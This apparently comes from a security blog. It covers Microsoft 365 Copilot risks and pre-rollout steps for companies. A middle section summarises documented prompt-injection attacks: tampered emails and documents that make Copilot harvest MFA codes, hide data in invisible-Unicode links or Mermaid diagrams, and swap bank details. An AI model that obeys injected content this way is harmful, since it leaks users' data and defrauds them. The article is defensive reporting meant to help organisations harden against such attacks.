Copilot Security Risk: When AI Assistant Leaks Corporate Secrets

8 min read

Microsoft 365 Copilot has a zero-click vulnerability rated CVSS 9.3. The European Data Protection Supervisor has reprimanded the EU Commission for its use of M365. And 34 percent of German employees are using AI tools outside the corporate IT. Three facts, one problem: companies are rolling out AI assistants without first building the security architecture to support them.

EchoLeak: The first zero-click AI vulnerability

Copilot is not a chatbot. It is a system that can access every piece of data a user can see in SharePoint, OneDrive, Teams and Outlook—and sometimes data they shouldn’t. For IT-security teams, that means every permission gap, every forgotten “Anyone” share, every orphaned workspace suddenly becomes reachable via an AI search engine. This article outlines documented attack vectors, what Germany’s BSI recommends, and which steps must be taken before any Copilot rollout.

In January 2025 researchers at Aim Labs uncovered a flaw in Microsoft 365 Copilot that opened a new category: CVE-2025-32711, dubbed “EchoLeak.” CVSS score: 9.3 out of 10. What made it unique: no click, no file open, no user interaction required. The attacker could exfiltrate data straight from another user’s Copilot context.

Microsoft patched the gap in May 2025. But EchoLeak marks a turning point: it was the first documented case of a zero-click vulnerability in a live LLM system. For security teams, that means AI assistants don’t just add new attack surfaces—they create surfaces that can be exploited without any involvement from the victim.

Prompt Injection: Four Documented Attack Vectors

EchoLeak isn’t the only documented attack vector. Since 2024, security researchers have uncovered multiple ways to manipulate Copilot—and Microsoft has had to patch each one.

ASCII Smuggling (Johann Rehberger, 2024): The researcher demonstrated that invisible Unicode characters can conceal sensitive data inside seemingly harmless hyperlinks. A single tampered email or doctored document is enough: Copilot executes an indirect prompt injection, harvests data (including MFA codes), and hides it inside a link. A single click by the user exfiltrates the data. Microsoft initially rated the finding “Low Severity” and only issued a patch after a public demonstration at HITCON.

Mermaid Diagram Exfiltration (Truesec, September 2025): Copilot could be tricked via manipulated Office documents into embedding email contents into interactive links inside Mermaid diagrams. Microsoft responded by disabling interactive links in Mermaid diagrams entirely.

Confidential Label Bypass (January 2026): Copilot accessed protected emails in Sent Items and Drafts despite set confidentiality labels. DLP policies were bypassed. Microsoft released an emergency patch.

Indirect Prompt Injection via Email (Zenity, Black Hat 2024): Zenity’s CTO showed at Black Hat USA that Copilot processes tampered emails automatically—without the victim ever opening them. In the demo, Copilot swapped bank details in payment instructions and presented a fake Microsoft login page.

“The BSI recommends conducting a risk analysis for the specific use case before integrating large language AI models into workflows.”
– BSI, Generative AI Models: Opportunities and Risks, paraphrased (May 2024)

Oversharing: The underestimated everyday risk

The spectacular vulnerabilities dominate the headlines. Yet the biggest Copilot risk is mundane: excessive permissions in SharePoint, OneDrive and Teams. Microsoft itself identifies oversharing as the most common risk category in Copilot deployments.

The issue: Copilot leverages the existing permission model. If a SharePoint folder was shared via an “Anyone” link, if orphaned workspaces still carry active permissions, if nested group permissions grant access to data the user never consciously saw—Copilot instantly makes all of it searchable and summarizable.

Take this example: an employee asks Copilot, “What was discussed about Project Alpha last week?” Copilot scans every Teams chat, email and SharePoint document the user can access—including channels they never visited and folders they never opened. When permissions are too permissive, Copilot surfaces confidential information the user would never have found without it.

For German companies this is especially explosive. Unlike in the U.S., where data access within a company is often handled liberally, the GDPR imposes strict requirements on purpose limitation and data minimization. If Copilot summarizes salary negotiations from an HR channel for a marketing employee because Teams permissions were too broad, that is not merely a security problem—it is a GDPR violation. Bavarian and North Rhine-Westphalia regulators have already signaled that AI-assisted data processing will receive special scrutiny.

Microsoft’s own recommendation is unambiguous: before rolling out Copilot, clean up the permission model. The Oversharing Assessment Blueprint calls for enforcing least-privilege principles, regular permission reviews and SharePoint Advanced Management to identify risky sites. In practice, that means weeks to months of prep work before the first user should activate Copilot.

EDPS Ruling: When the European Commission Itself Violates Data Protection Law

On 8 March 2024 the European Data Protection Supervisor (EDPS) officially determined that the European Commission breached EU data-protection Regulation 2018/1725 when deploying Microsoft 365. The core findings: insufficient specification of which personal data Microsoft collects and for what purposes, and a lack of adequate safeguards for transfers outside the EU/EEA.

The sanction was drastic: from 9 December 2024 all transfers of data to Microsoft outside the EU/EEA had to be suspended. The European Commission has since remedied the breaches—the EDPS closed the investigation in July 2025—but the ruling remains a precedent. If the Commission itself can fall foul of data-protection rules with Microsoft M365, what does that mean for a mid-sized company running the same software with far fewer resources?

For DACH enterprises this is a concrete call to action. A data-protection impact assessment under Article 35 GDPR is strongly advised whenever Copilot is used, according to privacy lawyers. Microsoft has announced in-country data processing for Germany by November 2025, yet whether this fully dispels GDPR concerns is hotly debated among legal scholars.

In November 2025 the BSI issued a specific warning on “evasion attacks on AI language models.” Recommendations include precise system prompts, filtering harmful content in third-party documents, and explicit user confirmation before any action an LLM executes. CERT-Bund has published Advisory WID-SEC-2025-1746 on M365 Copilot. For organisations subject to NIS2 or critical-infrastructure rules, these BSI recommendations are not optional—they form part of the duty of care whose breach can trigger personal liability for managing directors.

Shadow AI: The Problem Growing Faster Than Policy

While IT departments deliberate Copilot roll-outs, employees have long taken matters into their own hands. According to Bitkom, 34 percent of German employees use generative AI tools with private accounts outside corporate IT. In 8 percent of companies shadow AI is widespread—a doubling versus last year—and only 23 percent of firms have defined rules for AI use.

Globally the picture is no brighter: a WalkMe survey of 12,000 knowledge workers found 60 percent use AI tools at work, yet only 18.5 percent know of an official AI policy from their employer. Thirty-eight percent share confidential data with AI platforms without approval.

Gartner forecasts that by 2030 more than 40 percent of global companies will experience security or compliance incidents caused by unauthorised AI tools. The 2027 outlook is sharper: 40 percent of all AI data-protection breaches will stem from cross-border misuse of generative AI.

Why Copilot Is More Dangerous Than ChatGPT

Many companies equate Copilot with ChatGPT—a chatbot for writing texts. That’s a fundamental misunderstanding. ChatGPT works with the data the user enters. Copilot works with all data the user has access to—plus all data in shared resources they could theoretically access.

The practical difference: if an employee feeds ChatGPT an internal document, that’s a conscious decision—problematic, but understandable. When Copilot autonomously scans emails, aggregates Teams chats, and summarizes SharePoint documents, it does so automatically and invisibly. Users often don’t even know which sources Copilot uses to assemble its answers.

This has consequences for the attack surface. With ChatGPT, an attacker must trick the user into submitting a manipulated prompt. With Copilot, it’s enough to send a tampered email or drop a doctored file into a shared folder. Copilot pulls the content on its own—that’s the mechanism the Zenity CTO demonstrated at Black Hat and which Johann Rehberger refined with ASCII Smuggling.

For security teams, this means: threat modeling for Copilot is fundamentally different than for other AI tools. Training users isn’t enough. You must secure the entire data landscape—because Copilot will find every gap and serve it to the user on a silver platter.

Microsoft recognized this and since late 2025 has offered in-country data processing for 15 countries, including Germany. That partially solves the data-transfer issue. But it doesn’t fix the oversharing problem or prevent prompt-injection attacks that occur within the tenant’s own boundaries.

What you must do before rolling out Copilot

1. Permission audit before rollout. Microsoft recommends SharePoint Advanced Management for systematic permission reviews. Eliminate “anyone” links, identify orphaned workspaces, and flatten nested group permissions. No Copilot access without a completed permission audit.

2. Deploy sensitivity labels everywhere. Apply Microsoft Purview Information Protection labels to every document and e-mail. Without labels there is no effective DLP control—and Copilot ignores anything that isn’t labeled.

3. Configure DLP policies for Copilot. Since 2025 Microsoft Purview DLP explicitly supports the location “Microsoft 365 Copilot.” Skip this step and you unleash Copilot on company data without guardrails.

4. Pilot group before organisation-wide rollout. Limit the initial group to 50 users in a controlled environment. Monitor: which data is Copilot surfacing that it shouldn’t? Only scale once the answer is “none.”

5. Conduct a GDPR impact assessment. Article 35 GDPR requires a data-protection impact assessment when processing is likely to result in high risks. A KI system that accesses all company data meets this criterion.

6. Establish an AI usage policy. Clear rules: which tools are allowed, which data may be entered, how shadow AI is handled. Bitkom figures show: without a policy, everyone does whatever they want.

The interplay of official Copilot rollouts and unofficial shadow AI creates a double attack surface. On one side, the controlled Copilot instances with their documented vulnerabilities. On the other, uncontrolled private AI tools into which employees feed customer data, contract details, and internal strategy papers—without audit, logging, or any chance of traceability. For CISOs this is a nightmare scenario: you cannot fully secure either the official or the unofficial AI channel.

“AI-driven attacks are, according to Gartner, the top emerging risk for companies—three quarters in a row.” – Gartner Q3 2024 Emerging Risks Survey, paraphrased

The crucial point: Copilot is not a security problem per se. It’s a multiplier. Organisations that have their permissions under control benefit. Those that don’t give an AI access to everything that’s poorly secured—and make it searchable, summarisable, and exportable. Preparing for Copilot isn’t an IT task; it’s a security task.

One final thought for context: Microsoft is not the enemy. Copilot is a productive tool that, with the right preparation, delivers real added value. But preparation is the key—and most companies underestimate the effort. The EchoLeak vulnerability, the EDPS ruling, and Bitkom’s shadow-AI figures all point the same way: organisations that roll out AI assistants without first putting permissions, data-protection architecture, and usage policies in order are acting negligently. And under NIS2, negligence in IT security can have personal consequences for senior management.

Frequently Asked Questions

Is Microsoft 365 Copilot unsafe?

Copilot itself isn’t inherently unsafe. It does, however, amplify existing permission problems—making data accessible that users would never have found without Copilot. Documented vulnerabilities (EchoLeak, ASCII Smuggling, label bypass) have been patched by Microsoft, yet they show the system remains attackable.

What is EchoLeak (CVE-2025-32711)?

The first documented zero-click vulnerability in a production KI system. CVSS score 9.3 out of 10. Attackers could exfiltrate data from the Copilot context without any user action. Microsoft closed the gap in May 2025.

What did the EDPS decide about Microsoft 365 usage?

In March 2024 the European Data Protection Supervisor ruled that the European Commission had violated data-protection law when using M365. The breaches were remediated by July 2025, yet the ruling remains a precedent for every EU organisation using M365.

Do I Need a GDPR Impact Assessment for Copilot?

Data-protection lawyers strongly recommend conducting a data-protection impact assessment under Art. 35 GDPR, since Copilot processes personal data and has broad access to corporate data. Microsoft’s Data Processing Addendum contains no specific provisions for AI/Copilot.

How Widespread Is Shadow AI in German Companies?

34 percent of German employees use generative-AI tools with private accounts that bypass corporate IT (Bitkom 2024). In 8 percent of firms, shadow AI is already widespread. Only 23 percent have formal rules for AI use.

What Must I Do Before Rolling Out Copilot?

At minimum: run a permissions audit in SharePoint, OneDrive and Teams; roll out sensitivity labels enterprise-wide; configure data-loss-prevention (DLP) policies for Copilot; perform a GDPR impact assessment; and establish an AI usage policy. Microsoft advises a pilot test with no more than 50 users.

Can Copilot Access Confidential E-Mails?

Yes—if the permissions allow it. In January 2026 a bug was documented in which Copilot accessed protected e-mails in Sent Items and Drafts despite confidentiality labels. Microsoft issued an emergency patch.

Source of cover image: Pexels / cottonbro studio (px:6153354)

About the author: Tobias Massow

More articles by Tobias Massow